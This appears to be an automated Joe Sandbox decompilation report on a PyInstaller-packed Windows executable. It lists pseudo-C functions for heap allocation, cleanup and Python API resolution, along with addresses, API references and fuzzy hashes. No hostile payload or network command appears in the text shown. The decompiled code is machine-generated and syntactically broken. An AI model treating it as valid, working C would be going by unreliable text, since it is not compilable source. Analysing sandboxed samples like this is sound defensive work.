                                                                                                                                                                                                                                                        				if (_t22 == 0) goto 0xe5acdd71;
                                                                                                                                                                                                                                                        				goto 0xe5acddaf;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t22);
                                                                                                                                                                                                                                                        				 *_t22 = 0xc;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                                                        0x7ff6e5acdd40
                                                                                                                                                                                                                                                        0x7ff6e5acdd4f
                                                                                                                                                                                                                                                        0x7ff6e5acdd53
                                                                                                                                                                                                                                                        0x7ff6e5acdd53
                                                                                                                                                                                                                                                        0x7ff6e5acdd5d
                                                                                                                                                                                                                                                        0x7ff6e5acdd6b
                                                                                                                                                                                                                                                        0x7ff6e5acdd6f
                                                                                                                                                                                                                                                        0x7ff6e5acdd78
                                                                                                                                                                                                                                                        0x7ff6e5acdd84
                                                                                                                                                                                                                                                        0x7ff6e5acdd95
                                                                                                                                                                                                                                                        0x7ff6e5acdd9e
                                                                                                                                                                                                                                                        0x7ff6e5acdda0
                                                                                                                                                                                                                                                        0x7ff6e5acdda2
                                                                                                                                                                                                                                                        0x7ff6e5acdda7
                                                                                                                                                                                                                                                        0x7ff6e5acddb4

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6E5ACA8B6,?,?,?,00007FF6E5AC9A73,?,?,00000000,00007FF6E5AC9D0E), ref: 00007FF6E5ACDD95
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                                                                                                                                                                                                                        • Instruction ID: f01e4ccff29c5700990399161b714d96f95dfcebee9d85352ededbfe70ee63fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF04F96F1A24241FF96666A59203B502815F84F80F185430CD0EEE282EF1EEC40822A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACCACC(intOrPtr* __rax, void* __rcx) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				if (__rcx - 0xffffffe0 > 0) goto 0xe5accb17;
                                                                                                                                                                                                                                                        				_t16 =  ==  ? __rax : __rcx;
                                                                                                                                                                                                                                                        				goto 0xe5accafe;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC8AEC() == 0) goto 0xe5accb17;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD26B0(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0xe5accb17;
                                                                                                                                                                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                                                                                                                                                                        				if (__rax == 0) goto 0xe5accae9;
                                                                                                                                                                                                                                                        				goto 0xe5accb24;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 0xc;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}




                                                                                                                                                                                                                                                        0x7ff6e5accad9
                                                                                                                                                                                                                                                        0x7ff6e5accae3
                                                                                                                                                                                                                                                        0x7ff6e5accae7
                                                                                                                                                                                                                                                        0x7ff6e5accaf0
                                                                                                                                                                                                                                                        0x7ff6e5accafc
                                                                                                                                                                                                                                                        0x7ff6e5accb0a
                                                                                                                                                                                                                                                        0x7ff6e5accb13
                                                                                                                                                                                                                                                        0x7ff6e5accb15
                                                                                                                                                                                                                                                        0x7ff6e5accb17
                                                                                                                                                                                                                                                        0x7ff6e5accb1c
                                                                                                                                                                                                                                                        0x7ff6e5accb29

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,?,?,00007FF6E5ABFE44,?,?,?,00007FF6E5AC1356,?,?,?,?,?,00007FF6E5AC2949), ref: 00007FF6E5ACCB0A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                                                                                                                                                                                                                        • Instruction ID: 30175465fd583497545f8d12526f36779b1eadfbe060d548de6fa95cf4910405
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3F03452B1924241FB246AA9693037511815F48FA0F0D0630DE3ECB6C2EF2EAC80861A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC4290() {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                                                        				intOrPtr* _t11;
                                                                                                                                                                                                                                                        				long long _t12;
                                                                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                                                                        				signed long long _t15;
                                                                                                                                                                                                                                                        				signed long long _t19;
                                                                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC5D5C(_t12, _t14, _t20, _t21, _t22);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACE354(_t12, _t20);
                                                                                                                                                                                                                                                        				_t15 =  *0xe5afc788; // 0x0
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACA258(_t10,  *((intOrPtr*)(_t12 + _t15)));
                                                                                                                                                                                                                                                        				_t11 =  *0xe5afc788; // 0x0
                                                                                                                                                                                                                                                        				DeleteCriticalSection(??);
                                                                                                                                                                                                                                                        				if (_t12 + 8 != 0x18) goto 0xe5ac42a2;
                                                                                                                                                                                                                                                        				_t19 =  *0xe5afc788; // 0x0, executed
                                                                                                                                                                                                                                                        				_t6 = E00007FF67FF6E5AC9E18(_t11, _t19); // executed
                                                                                                                                                                                                                                                        				 *0xe5afc788 =  *0xe5afc788 & 0x00000000;
                                                                                                                                                                                                                                                        				return _t6;
                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                        0x7ff6e5ac4296
                                                                                                                                                                                                                                                        0x7ff6e5ac429b
                                                                                                                                                                                                                                                        0x7ff6e5ac42a2
                                                                                                                                                                                                                                                        0x7ff6e5ac42ad
                                                                                                                                                                                                                                                        0x7ff6e5ac42b2
                                                                                                                                                                                                                                                        0x7ff6e5ac42c1
                                                                                                                                                                                                                                                        0x7ff6e5ac42cf
                                                                                                                                                                                                                                                        0x7ff6e5ac42d1
                                                                                                                                                                                                                                                        0x7ff6e5ac42d8
                                                                                                                                                                                                                                                        0x7ff6e5ac42dd
                                                                                                                                                                                                                                                        0x7ff6e5ac42ea

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CriticalDeleteSection
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 166494926-0
                                                                                                                                                                                                                                                        • Opcode ID: 066cf33954fc3552a24a66991efd62cfe73146ad79f47286d91badc5233704aa
                                                                                                                                                                                                                                                        • Instruction ID: 7d0722045d24d3f2e3fd6e413c2e6323c64e567f74f9566e11c9a1056674b439
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 066cf33954fc3552a24a66991efd62cfe73146ad79f47286d91badc5233704aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECF01267F0890281EF00AB6ED8B53746290EF94F04F500031DA0EC62A2CF5EA894432B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 377330604-0
                                                                                                                                                                                                                                                        • Opcode ID: 7bec2109183b07f1093a4788361d4b10d7cee014a84238bf74f355e0c818f314
                                                                                                                                                                                                                                                        • Instruction ID: 136cf97da04f4e73b941e0964c4c136f9d6cc452c3d6ae5cf2dc3f9f375b431a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bec2109183b07f1093a4788361d4b10d7cee014a84238bf74f355e0c818f314
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1341C917E1868981EA51AB2C95113FC2760FFA8B44F409232DF8DC2147EF69E9C8C356
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 23%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB3DF0(void* __edx, long long __rax, struct HINSTANCE__* __rbx, void* __rcx, void* _a8) {
                                                                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				GetProcAddress(__rbx);
                                                                                                                                                                                                                                                        				 *0xe5aedcb8 = __rax;
                                                                                                                                                                                                                                                        				if (__rax != 0) goto 0xe5ab3e3b;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2620(__rax, __rax, "GetProcAddress", "Failed to get address for Py_DontWriteBytecodeFlag\n", _t20, _t21);
                                                                                                                                                                                                                                                        				return 0xffffffff;
                                                                                                                                                                                                                                                        			}





                                                                                                                                                                                                                                                        0x7ff6e5ab3e06
                                                                                                                                                                                                                                                        0x7ff6e5ab3e0c
                                                                                                                                                                                                                                                        0x7ff6e5ab3e16
                                                                                                                                                                                                                                                        0x7ff6e5ab3e26
                                                                                                                                                                                                                                                        0x7ff6e5ab3e3a

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                                                                                                        • API String ID: 190572456-3109299426
                                                                                                                                                                                                                                                        • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                                                                                                                                                        • Instruction ID: 9c3c35afe7e7b42d713b8d163eaa1aa4802448f0a93f8e26eadb3588acd63293
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8342AE67B0DB0B91E995EB0CA87437423A16F04F88F44513AC90DC5268EF7FAD589B4A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                                                                        • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                                                                        • API String ID: 2446303242-1601438679
                                                                                                                                                                                                                                                        • Opcode ID: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                                                                                                                                                                                                                        • Instruction ID: 15990fab18f4b56fc0cb9f7181427ad1b6d4069e1d9cc3ce9b73b0968a3b231f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EA14536308B8187E7549F25E56479AB360FB88B84F50412ADF8D83B24CF3EE565CB44
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD31CC(void* __edx, void* __rbx, unsigned int __rcx, signed int __rdx, void* __rdi, void* __rsi, long long __r9, void* __r12, void* __r14, void* __r15) {
                                                                                                                                                                                                                                                        				signed long long _t33;
                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                                                                        				signed long long _t50;
                                                                                                                                                                                                                                                        				long long _t55;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t46 = __rdi;
                                                                                                                                                                                                                                                        				_t48 = _t49 - 0x6f0;
                                                                                                                                                                                                                                                        				_t50 = _t49 - 0x7f0;
                                                                                                                                                                                                                                                        				_t33 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				 *(_t48 + 0x6e0) = _t33 ^ _t50;
                                                                                                                                                                                                                                                        				_t55 =  *((intOrPtr*)(_t48 + 0x750));
                                                                                                                                                                                                                                                        				 *(_t50 + 0x50) = __rcx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t48 - 0x78)) = _t55;
                                                                                                                                                                                                                                                        				 *((long long*)(_t48 - 0x68)) = __r9;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t50 + 0x64)) = r8d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD7190(_t50 + 0x70);
                                                                                                                                                                                                                                                        				r15d = 1;
                                                                                                                                                                                                                                                        				if (( *(_t50 + 0x70) & 0x0000001f) != 0x1f) goto 0xe5ad3237;
                                                                                                                                                                                                                                                        				 *((char*)(_t50 + 0x78)) = 0;
                                                                                                                                                                                                                                                        				goto 0xe5ad3246;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD7208(( *(_t50 + 0x70) & 0x0000001f) - 0x1f, _t50 + 0x70);
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t50 + 0x78)) = r15b;
                                                                                                                                                                                                                                                        				 *((long long*)(__r9 + 8)) = _t55;
                                                                                                                                                                                                                                                        				_t15 = _t46 + 0xd; // 0x2d
                                                                                                                                                                                                                                                        				_t22 =  <  ? _t15 : 0x20;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9)) =  <  ? _t15 : 0x20;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD712C(0, _t33 ^ _t50, _t48 - 0x80);
                                                                                                                                                                                                                                                        				if (( *(_t50 + 0x50) >> 0x00000034 & __rdx) != 0) goto 0xe5ad32ae;
                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                        0x7ff6e5ad31cc
                                                                                                                                                                                                                                                        0x7ff6e5ad31d7
                                                                                                                                                                                                                                                        0x7ff6e5ad31df
                                                                                                                                                                                                                                                        0x7ff6e5ad31e6
                                                                                                                                                                                                                                                        0x7ff6e5ad31f0
                                                                                                                                                                                                                                                        0x7ff6e5ad31f7
                                                                                                                                                                                                                                                        0x7ff6e5ad3201
                                                                                                                                                                                                                                                        0x7ff6e5ad320d
                                                                                                                                                                                                                                                        0x7ff6e5ad3211
                                                                                                                                                                                                                                                        0x7ff6e5ad3215
                                                                                                                                                                                                                                                        0x7ff6e5ad321a
                                                                                                                                                                                                                                                        0x7ff6e5ad3223
                                                                                                                                                                                                                                                        0x7ff6e5ad322e
                                                                                                                                                                                                                                                        0x7ff6e5ad3230
                                                                                                                                                                                                                                                        0x7ff6e5ad3235
                                                                                                                                                                                                                                                        0x7ff6e5ad323c
                                                                                                                                                                                                                                                        0x7ff6e5ad3241
                                                                                                                                                                                                                                                        0x7ff6e5ad3252
                                                                                                                                                                                                                                                        0x7ff6e5ad325a
                                                                                                                                                                                                                                                        0x7ff6e5ad325d
                                                                                                                                                                                                                                                        0x7ff6e5ad3260
                                                                                                                                                                                                                                                        0x7ff6e5ad3265
                                                                                                                                                                                                                                                        0x7ff6e5ad326d
                                                                                                                                                                                                                                                        0x7ff6e5ad328b

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
